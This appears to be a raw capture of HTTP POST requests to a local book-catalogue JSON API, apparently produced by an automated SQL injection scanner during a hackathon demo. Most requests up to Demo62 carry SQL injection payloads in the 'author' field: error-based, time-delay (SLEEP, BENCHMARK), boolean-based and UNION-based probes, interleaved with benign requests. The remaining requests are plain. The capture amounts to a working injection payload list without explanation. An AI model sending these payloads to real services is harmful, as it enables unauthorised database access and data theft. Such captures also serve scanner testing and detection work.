	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 260		{"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 61		{"name":"Hackathon-Demo1","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 72		{"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 61		{"name":"Hackathon-Demo3","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 73		{"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 61		{"name":"Hackathon-Demo5","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 149		{"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 61		{"name":"Hackathon-Demo7","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 82		{"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 61		{"name":"Hackathon-Demo9","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 93		{"name":"Hackathon-Demo10","author":"Ramesh %"))) AND 1868=7345 AND ((("%"="","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo11","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 92		{"name":"Hackathon-Demo12","author":"Ramesh%"))) AND 3428=3428 AND ((("%"="","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo13","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 82		{"name":"Hackathon-Demo14","author":"Ramesh' AND 2353=8039-- HKuw","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo15","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 92		{"name":"Hackathon-Demo16","author":"Ramesh' AND 3428=3428 AND 'UXQG'='UXQG","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo17","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 97		{"name":"Hackathon-Demo18","author":"Ramesh' AND 3428=3428 AND 'XXPS' LIKE 'XXPS","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo19","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 82		{"name":"Hackathon-Demo20","author":"Ramesh' AND 3428=3428-- jSyW","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo21","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 97		{"name":"Hackathon-Demo22","author":"Ramesh' AND 4786=4963 AND 'IIVq' LIKE 'IIVq","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo23","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 92		{"name":"Hackathon-Demo24","author":"Ramesh' AND 5103=4169 AND 'CEYB'='CEYB","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo25","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 93		{"name":"Hackathon-Demo26","author":"Ramesh' IN BOOLEAN MODE) AND 3428=3428#","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo27","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 93		{"name":"Hackathon-Demo28","author":"Ramesh' IN BOOLEAN MODE) AND 4810=4637#","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo29","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 98		{"name":"Hackathon-Demo30","author":"Ramesh' WHERE 4925=4925 AND 1281=7105-- OCdK","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo31","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 98		{"name":"Hackathon-Demo32","author":"Ramesh' WHERE 5527=5527 AND 3428=3428-- QxBN","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo33","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 94		{"name":"Hackathon-Demo34","author":"Ramesh') AND 3428=3428 AND ('QGry'='QGry","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo35","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 99		{"name":"Hackathon-Demo36","author":"Ramesh') AND 3428=3428 AND ('aSyd' LIKE 'aSyd","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo37","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 83		{"name":"Hackathon-Demo38","author":"Ramesh') AND 3428=3428-- gvQa","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo39","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 99		{"name":"Hackathon-Demo40","author":"Ramesh') AND 6605=1377 AND ('JIdw' LIKE 'JIdw","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo41","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 129		{"name":"Hackathon-Demo42","author":"RameshSELECT CONCAT(0x717a786271,(SELECT (ELT(9500=9500,1))),0x7176767871))","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo43","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 149		{"name":"Hackathon-Demo44","author":"Ramesh(UPDATEXML(3615,CONCAT(0x2e,0x717a786271,(SELECT (ELT(3615=3615,1))),0x7176767871),5839))","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo45","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 103		{"name":"Hackathon-Demo46","author":"Ramesh-1011)) OR (1891=4226)*4226 AND ((9752=9752","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo47","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 388		{"name":"Hackathon-Demo48","author":"Ramesh-1012 UNION ALL SELECT 3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447,3447#","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo49","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 87		{"name":"Hackathon-Demo50","author":"Ramesh-1012))) OR 7241=4523\u0016","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo51","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 93		{"name":"Hackathon-Demo52","author":"Ramesh1960 OR ELT(2187=4030,4030)# jqpa","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo53","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 110		{"name":"Hackathon-Demo54","author":"Ramesh-1961')) OR ELT(8504=1300,1300) AND (('ofRR'='ofRR","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo55","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 88		{"name":"Hackathon-Demo56","author":"Ramesh-1969%') OR 1943=1943-- dJSs","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo57","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 96		{"name":"Hackathon-Demo58","author":"Ramesh-1969%'))) OR 3191=4443 AND ((('%'='","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo59","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 87		{"name":"Hackathon-Demo60","author":"Ramesh-1976") OR 7547=7547-- mTUA","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 62		{"name":"Hackathon-Demo61","author":"Ramesh-P","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 80		{"name":"Hackathon-Demo62","author":"Ramesh-1983' OR 1598=4389#","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
	POST /books HTTP/1.1	User-Agent: curl/7.29.0	Host: localhost:8080	Accept: */*	Content-type:application/json	Content-Length: 58		{"name":"Hackathon-Demo","author":"Ramesh","price":"9.99"}[!http]
